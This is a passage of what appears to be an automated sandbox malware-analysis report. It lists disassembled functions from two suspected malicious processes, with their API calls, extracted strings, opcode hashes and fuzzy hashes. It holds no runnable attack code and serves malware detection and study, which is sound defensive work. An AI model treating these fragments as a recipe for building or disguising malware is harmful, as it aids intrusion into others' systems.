                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00DFA675
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DFA683
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00DFA691
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: CapsDevice$Release
                                                                    • String ID:
                                                                    • API String ID: 1035833867-0
                                                                    • Opcode ID: 53d86e12561fdf3f8f6f737c59f885ff07e49f6d14d3c5a949230826b24d857b
                                                                    • Instruction ID: 3322c7dec92ee66d1782f136e8b61a7b3dd6279e3c50edf774adf76bd4c99721
                                                                    • Opcode Fuzzy Hash: 53d86e12561fdf3f8f6f737c59f885ff07e49f6d14d3c5a949230826b24d857b
                                                                    • Instruction Fuzzy Hash: C5E0E635942721AFD3615B766D0DB8B3E54AB16B52F054301F605B5190DB64450A8BA1
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID: *?$.
                                                                    • API String ID: 269201875-3972193922
                                                                    • Opcode ID: 9ea54cabc149a7bf8f0739983d84df0ad1cd527b12044001bb6944ddd1c94f41
                                                                    • Instruction ID: c54ab9f055ae1ae0ed3cac41ade5971608fedc4a2ec2f9c4c43848a112591c6d
                                                                    • Opcode Fuzzy Hash: 9ea54cabc149a7bf8f0739983d84df0ad1cd527b12044001bb6944ddd1c94f41
                                                                    • Instruction Fuzzy Hash: 98519D71E0020AAFDF14DFA8C881AADBBF5FF58314F245169E844F7391E7759A418B50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _swprintf
                                                                    • String ID: %ls$%s: %s
                                                                    • API String ID: 589789837-2259941744
                                                                    • Opcode ID: bad46e398743cecb53c1277b9fa68157014ff02d99359abef047137dfd92d08a
                                                                    • Instruction ID: f561d811f4b4c4436d1a403b2e8846b9d4230a00fca04d75bebd85114bf05857
                                                                    • Opcode Fuzzy Hash: bad46e398743cecb53c1277b9fa68157014ff02d99359abef047137dfd92d08a
                                                                    • Instruction Fuzzy Hash: DA41A93D28830CF6E6112A909E46F317665EB05B44F26C607F7DEB84E1D9A3D450BB3A
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DE9387
                                                                      • Part of subcall function 00DEC29A: _wcslen.LIBCMT ref: 00DEC2A2
                                                                    • _swprintf.LIBCMT ref: 00DE9465
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog_swprintf_wcslen
                                                                    • String ID: rtmp%d
                                                                    • API String ID: 4240179315-3303766350
                                                                    • Opcode ID: b2b10d973c1b496973a23d55ab3df39a3df58aaacba80a0364173c9a12038129
                                                                    • Instruction ID: 8283f3f6fcc9a136969db0da76a98928b7d0ba522c1a0824c77958dd22021184
                                                                    • Opcode Fuzzy Hash: b2b10d973c1b496973a23d55ab3df39a3df58aaacba80a0364173c9a12038129
                                                                    • Instruction Fuzzy Hash: CE418871901299AACF21FB62CC55DEEB37CEF45340F0488A5B649E3051DB388B898B74
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcschr
                                                                    • String ID: *
                                                                    • API String ID: 2691759472-163128923
                                                                    • Opcode ID: eea8a9dfbd7b31f8b35dba31094e2fd62e80c7046ba4a81ab6d92cf5b559ef3e
                                                                    • Instruction ID: 83ee1b764665099ddfc15e8a7c05f7ce9d527920fe39f4a0734c217efc5ce304
                                                                    • Opcode Fuzzy Hash: eea8a9dfbd7b31f8b35dba31094e2fd62e80c7046ba4a81ab6d92cf5b559ef3e
                                                                    • Instruction Fuzzy Hash: 553114221043819ADB30BA578942A7B73E8DF90B3CB18801FF9C8571C3E766BD819671
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _abort
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 1888311480-2084237596
                                                                    • Opcode ID: ff46e065b4db9065a0124c80e302aca17463e986f3d83de8e2d1e2e6caebe209
                                                                    • Instruction ID: ac2930d5eedceb0ea138c9b39d7941aead85ec9e06318b7cd22952a61f047ff2
                                                                    • Opcode Fuzzy Hash: ff46e065b4db9065a0124c80e302aca17463e986f3d83de8e2d1e2e6caebe209
                                                                    • Instruction Fuzzy Hash: 3D415871900209AFCF15DFA4CD81AEEBBB9FF48308F189059FA04762A5D735AA90DB50
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DE7406
                                                                      • Part of subcall function 00DE3BBA: __EH_prolog.LIBCMT ref: 00DE3BBF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                    • API String ID: 3519838083-639343689
                                                                    • Opcode ID: d37526e7ea483aaf26e6ece986f1edc70717013b6aed07367137ecc229039f3c
                                                                    • Instruction ID: 9518dbae9049f63f3e8f0cc34c80a319e619924ae06486b17720cf2fa8e13550
                                                                    • Opcode Fuzzy Hash: d37526e7ea483aaf26e6ece986f1edc70717013b6aed07367137ecc229039f3c
                                                                    • Instruction Fuzzy Hash: 4931C371D04298AEDF51FBA6DC45FEE7BB9EB19304F084055F405B7182C7748A848771
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: }
                                                                    • API String ID: 176396367-4239843852
                                                                    • Opcode ID: 929c96203e6a390aa30b55ea081c8520d3dcbce445f1575dab006a599c67cffc
                                                                    • Instruction ID: 891c000be67bacb16a09baa7ebe2c6052088e4487610dcf21a9ee6655ff053c3
                                                                    • Opcode Fuzzy Hash: 929c96203e6a390aa30b55ea081c8520d3dcbce445f1575dab006a599c67cffc
                                                                    • Instruction Fuzzy Hash: EF21D17290430E5AD731AA64D845E7AB3DCDF91764F0A442BF680D3241EB69D98883B2
                                                                    APIs
                                                                    • DialogBoxParamW.USER32(GETPASSWORD1,00010486,00DFB270,?,?), ref: 00DFDE18
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: DialogParam
                                                                    • String ID: GETPASSWORD1$xz
                                                                    • API String ID: 665744214-3234807970
                                                                    • Opcode ID: 439e65d6f826c1815e5d36a952172d32779a23873286aca4622dc00eb8694b46
                                                                    • Instruction ID: 41cffaec4206c60176fa565e7adb18d09156188d11802f1c38269f56a3063ab7
                                                                    • Opcode Fuzzy Hash: 439e65d6f826c1815e5d36a952172d32779a23873286aca4622dc00eb8694b46
                                                                    • Instruction Fuzzy Hash: A0110F72600258AFDB21EB35EC01BFF3796A755750F158065BE45BB080C6B49D89C774
                                                                    APIs
                                                                      • Part of subcall function 00DEE2E8: _swprintf.LIBCMT ref: 00DEE30E
                                                                      • Part of subcall function 00DEE2E8: _strlen.LIBCMT ref: 00DEE32F
                                                                      • Part of subcall function 00DEE2E8: SetDlgItemTextW.USER32(?,00E1E274,?), ref: 00DEE38F
                                                                      • Part of subcall function 00DEE2E8: GetWindowRect.USER32(?,?), ref: 00DEE3C9
                                                                      • Part of subcall function 00DEE2E8: GetClientRect.USER32(?,?), ref: 00DEE3D5
                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
                                                                    • SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                    • String ID: 0
                                                                    • API String ID: 2622349952-4108050209
                                                                    • Opcode ID: 73e69a6fb673cab2601ff750b2f98f05ed9f81b2baff755a608771bd7b1c52aa
                                                                    • Instruction ID: 3f356b9934b464f9e2802fe608a99d1828f8dda310a80dfab2a21b3825bcf27f
                                                                    • Opcode Fuzzy Hash: 73e69a6fb673cab2601ff750b2f98f05ed9f81b2baff755a608771bd7b1c52aa
                                                                    • Instruction Fuzzy Hash: 43F0AF782043C8ABDF152FA28C0EBEA3B59AF41344F088314FD84609E1CB74CA95EA30
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0?#I$P?#I
                                                                    • API String ID: 0-587548566
                                                                    • Opcode ID: 6e0ba0285b2759e9fe148221c35ad1e459b7efca206296b0a31aa0d496243b7d
                                                                    • Instruction ID: a7d602c208b40507cf1aa9bbdf646a10e5d8a4e9c89e07369805a580690883f0
                                                                    • Opcode Fuzzy Hash: 6e0ba0285b2759e9fe148221c35ad1e459b7efca206296b0a31aa0d496243b7d
                                                                    • Instruction Fuzzy Hash: D552BE3091C6A98FEB6CEF18C4A46B977B1FF58341F5041BED45AC7686CB38A981CB40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $ MH$x9#I$x9#I
                                                                    • API String ID: 0-1480317629
                                                                    • Opcode ID: 9055fc81a4cee6d87314ecb50673e76f9e635c2a272764e33f2685b77c9e82f8
                                                                    • Instruction ID: 890073beff5b6dc531a58dd00ffe50872d575db0624a3f2b782154ccaa0cd0c4
                                                                    • Opcode Fuzzy Hash: 9055fc81a4cee6d87314ecb50673e76f9e635c2a272764e33f2685b77c9e82f8
                                                                    • Instruction Fuzzy Hash: 82515731D0C69E9FEB69EFA8D8515BDB7B1FF44341F1440BAC01AA7682CA382901CB50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: c9$!k9$"s9
                                                                    • API String ID: 0-3426396564
                                                                    • Opcode ID: d2e26fa0ed65657ae63860e0153e178c88320430f77beff0b58864d7961f4ac1
                                                                    • Instruction ID: ea2171c56bb580886a4ffbd80badf8b0638c16910a09b71096214cd4efb4d34e
                                                                    • Opcode Fuzzy Hash: d2e26fa0ed65657ae63860e0153e178c88320430f77beff0b58864d7961f4ac1
                                                                    • Instruction Fuzzy Hash: FA01F22A31D95A8FC7026A3EB4905D87B50EAC6136BC905BBD544CB192E2102C9EC7E0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0?#I$P?#I
                                                                    • API String ID: 0-587548566
                                                                    • Opcode ID: c23f5c8e0348d7d05eab37bc1286ea0e7a8c5378209b93dcf0cc835504283be5
                                                                    • Instruction ID: a85c611555c558b3c150738229b2d449ad2855bf2a2c3acfa99f372aca8d8056
                                                                    • Opcode Fuzzy Hash: c23f5c8e0348d7d05eab37bc1286ea0e7a8c5378209b93dcf0cc835504283be5
                                                                    • Instruction Fuzzy Hash: 7C511530D1C9AA8FFBB8EB2884652B9B7A1FF54341F4441FAD05EC7586DE386D808B41
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $(fH
                                                                    • API String ID: 0-861492242
                                                                    • Opcode ID: e9bb85664b3003ec4de44cb67bea5ac3da32a01408b171f3282a91d6b1d8fdb1
                                                                    • Instruction ID: 5af5e6cdc3698c4f5159f2f95adae76a56ba6ad620a549e7f78e8a26a71378e2
                                                                    • Opcode Fuzzy Hash: e9bb85664b3003ec4de44cb67bea5ac3da32a01408b171f3282a91d6b1d8fdb1
                                                                    • Instruction Fuzzy Hash: 4B515A30D0C69E9FEB69EFA8D8546BDBBB1FF54341F1041BAC01AE7682CA346905CB51
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (MH
                                                                    • API String ID: 0-2469153556
                                                                    • Opcode ID: 38e744b4adcb8fc465e203b6a994ce02a2b33bcda606a6c56a807a9c2c8e8f89
                                                                    • Instruction ID: 39e7e50bcdd258eaad4d7b9dc63bfe4bde3564f530ceda0d0ea1e43041b7f562
                                                                    • Opcode Fuzzy Hash: 38e744b4adcb8fc465e203b6a994ce02a2b33bcda606a6c56a807a9c2c8e8f89
                                                                    • Instruction Fuzzy Hash: 10D1F034A1DAA68FF378EF28D49057577E1FF44341B20497EC0AAC7A86DE29BC468741
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .#I
                                                                    • API String ID: 0-2821055689
                                                                    • Opcode ID: d959409b6f0ac201e068535a165d21d913a94bf98a209386ad8c29221af39bb5
                                                                    • Instruction ID: a08e69b5bf7c28601c0810f9ead390a62fc770d411f6142102efb2ee9ac90c28
                                                                    • Opcode Fuzzy Hash: d959409b6f0ac201e068535a165d21d913a94bf98a209386ad8c29221af39bb5
                                                                    • Instruction Fuzzy Hash: 4571DF30D1C59A8FFBA9EF6898556BCBBB1FF54381F1405BAC02AD3582DE296E41C740
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @%#I
                                                                    • API String ID: 0-897551743
                                                                    • Opcode ID: 50628f265c8097cbf04e4430991e4de4b70eb5a42c80c5e56dd348986ad3a6e3
                                                                    • Instruction ID: 2920aeb88bbe37b124b54c14829babda64144c1492af2833aa8fc939834b4d84
                                                                    • Opcode Fuzzy Hash: 50628f265c8097cbf04e4430991e4de4b70eb5a42c80c5e56dd348986ad3a6e3
                                                                    • Instruction Fuzzy Hash: 8E61E43191C4DB4FF778EE1898969B977C0FFA4352B1402B9D0AEC7996DE18AC06C781
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 80f2a85ad6658202f44b15557f5a9c7fe886e0adc36941961a98f14b9b27ba38
                                                                    • Instruction ID: 38895284644f878775211c2e671d407ad47b8e16729bab001224c22ddceb9542
                                                                    • Opcode Fuzzy Hash: 80f2a85ad6658202f44b15557f5a9c7fe886e0adc36941961a98f14b9b27ba38
                                                                    • Instruction Fuzzy Hash: BF516B71D0C69A9FEB59EFA8C4515FEBBB1FF45341F1041BAC01AE7682DA386902CB50
                                                                    • Instruction ID: 5998caead42a7eac8103cd12ab5ce7787fb5685fba97f0a4a01327ad0ca42c80
                                                                    • Opcode Fuzzy Hash: ce7dea4d658136c664cffff2f841a21eb7cccd02de66488e201a2225a7107cea
                                                                    • Instruction Fuzzy Hash: FCC1AB30A1CA9A9FE759EF28C4906B4B7A1FF48341F54417AC05EC7E86DB28BC51CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ec110a6f3c050cb4789858c9bd184430759240313d2220fd04ef2e37e241226e
                                                                    • Instruction ID: 7612aa8e0ed76053920ddeca6f58adadfa07bc2105b09c28b6bee1aebdc0ac10
                                                                    • Opcode Fuzzy Hash: ec110a6f3c050cb4789858c9bd184430759240313d2220fd04ef2e37e241226e
                                                                    • Instruction Fuzzy Hash: A921D216D0DAF79EF679792D34128FC17409F733E2F1805BAD16D828D2DD0C2C459296
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 75c5285b8f52ebee65064895b7be333f80b531fdc261dadedec636ce7e5d2b85
                                                                    • Instruction ID: 94f5c9df604ca5945be321781f8d5154fba9dd9b65960ce51033d5f27fb4825c
                                                                    • Opcode Fuzzy Hash: 75c5285b8f52ebee65064895b7be333f80b531fdc261dadedec636ce7e5d2b85
                                                                    • Instruction Fuzzy Hash: 3B213911D8D5E79FF2783EAE18211BCA690AF10392F180AB6C46D868C3DD5C3C547386
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 21a33bac799bf815cb132524b82eec107dd6963e812b31b4c2cfb4e93fe64dea
                                                                    • Instruction ID: 67f5c65f65b87f0ce0600e655ef28cba76f2f1dc69530bc612c14ae35a21e2b5
                                                                    • Opcode Fuzzy Hash: 21a33bac799bf815cb132524b82eec107dd6963e812b31b4c2cfb4e93fe64dea
                                                                    • Instruction Fuzzy Hash: 29B1D23091CA868FE759EF28C0906A5BBE1FF09341F5441BDC05EC7A86CB28BC52CB95
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 61ffe704d8963a32531bc41e3f271b2705a68a78f448580c2ed19e3ceee6c6a0
                                                                    • Instruction ID: 79ff87bc57d6efa168b8285bf61dc7c1fcd9c7b239837dd4b20cd781baa131df
                                                                    • Opcode Fuzzy Hash: 61ffe704d8963a32531bc41e3f271b2705a68a78f448580c2ed19e3ceee6c6a0
                                                                    • Instruction Fuzzy Hash: 93213A21D8D5E79FF2797E6E18211BCAA90AF10792F1C0ABAC46D868C3DD5C3C547386
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 40ac742ffdcdb5146bdcfac263848fdc8d9cc36857cd70ff444d7bd068a866f6
                                                                    • Instruction ID: 7f3f734c760340c6075eff0cf3ef5e778fc82a2facce3043b7aece9b14eb7f89
                                                                    • Opcode Fuzzy Hash: 40ac742ffdcdb5146bdcfac263848fdc8d9cc36857cd70ff444d7bd068a866f6
                                                                    • Instruction Fuzzy Hash: 6F81683191CB968FF378AE28A44127577E5EF95392F14057ED0AFC3982DE28BC028751
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 20dca2685c14265d51db06f78cdc2f1e8e67d02a76b32700ae8ee3c9e4e760ca
                                                                    • Instruction ID: 369d15198ef97b9cd1a7a3c77fc3daf82cde3175190a171edaae876285c54c8a
                                                                    • Opcode Fuzzy Hash: 20dca2685c14265d51db06f78cdc2f1e8e67d02a76b32700ae8ee3c9e4e760ca
                                                                    • Instruction Fuzzy Hash: 2D816831D0CA968FF738AE2898551B977E0EF91392F24057ED49FC3982DE28BC028751
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c66966200c4d88abd5e05af001c8c996cf8ea5e17137ffe3c7b8f28895aed44f
                                                                    • Instruction ID: e97701401c2fe021ff8278d2f915a8d1339ab0da46ae48c938c6a94962a18329
                                                                    • Opcode Fuzzy Hash: c66966200c4d88abd5e05af001c8c996cf8ea5e17137ffe3c7b8f28895aed44f
                                                                    • Instruction Fuzzy Hash: E381053191DA968FF739FF28940517577E0EF86392F14057ED1AEC3982DA28BC018792
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 39ed30bb2f67be5dc16124a4a65090420276fa0c527b16bed1ef1ae082dd9517
                                                                    • Instruction ID: 4a863edc6fb15fd96f8303ee4f0f6e993f7c1535d1f664d95e6a2ac5c6a071a4
                                                                    • Opcode Fuzzy Hash: 39ed30bb2f67be5dc16124a4a65090420276fa0c527b16bed1ef1ae082dd9517
                                                                    • Instruction Fuzzy Hash: 1671363198C4D94FF778FE1988565B937C0FF883D2B1002B9D5AEC7992DE18AC0A9781
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0619d05e00d22a9f812768f7decb24fae69f8d80baadfab922189df30427c9fd
                                                                    • Instruction ID: 472422bf449ccee182a001b75478401495bd4d3d03bcb98c964514317e098e5a
                                                                    • Opcode Fuzzy Hash: 0619d05e00d22a9f812768f7decb24fae69f8d80baadfab922189df30427c9fd
                                                                    • Instruction Fuzzy Hash: A5716B3190D4D9AFFB78FE1884465B537D0FF45392B2502BAD06EC7D52DE18AC2A8781
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8aaba6930a6eb8a7275025104cbe79daff1b9c3a202bb9e1d38cf67948b88de0
                                                                    • Instruction ID: bf0acca422fffd25adc950678432e5b0250b95ac2249c75f911823fdc5acddad
                                                                    • Opcode Fuzzy Hash: 8aaba6930a6eb8a7275025104cbe79daff1b9c3a202bb9e1d38cf67948b88de0
                                                                    • Instruction Fuzzy Hash: 8B719D31D1C99E8EFB68EF6888546BCBBB0FF49381F1405BAD01ED3591DE28AC458750
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 34774636cfc5140392eaeb5b682eabaa7f502d96825116ca6ea9a058adecb6e1
                                                                    • Instruction ID: ad0923d19acf35b760a23bea73b63d801be994a2bcb08e26ef583f30d6deca16
                                                                    • Opcode Fuzzy Hash: 34774636cfc5140392eaeb5b682eabaa7f502d96825116ca6ea9a058adecb6e1
                                                                    • Instruction Fuzzy Hash: 9A71BE30D1D59A9EFBA5EF688855ABCBBB1FF09382F1405B9C01EE7582DE287841C710
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fd18d115cba40a891a97a763655252566b4edbc20386d74278a3c0fc651792b9
                                                                    • Instruction ID: 04bebb7e57334a6d8c866e723d629677ea17ee5de59931dd5b3b1f71a943f604
                                                                    • Opcode Fuzzy Hash: fd18d115cba40a891a97a763655252566b4edbc20386d74278a3c0fc651792b9
                                                                    • Instruction Fuzzy Hash: AB71F23090CA8A8FE799EF28D4905B4BBA0FF15341F5441BAD45EC7A87DB28BC51CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
